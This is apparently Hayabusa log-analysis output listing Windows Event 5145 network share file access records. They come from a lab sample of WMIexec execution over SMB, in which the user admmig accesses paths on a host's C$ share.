10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.032 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
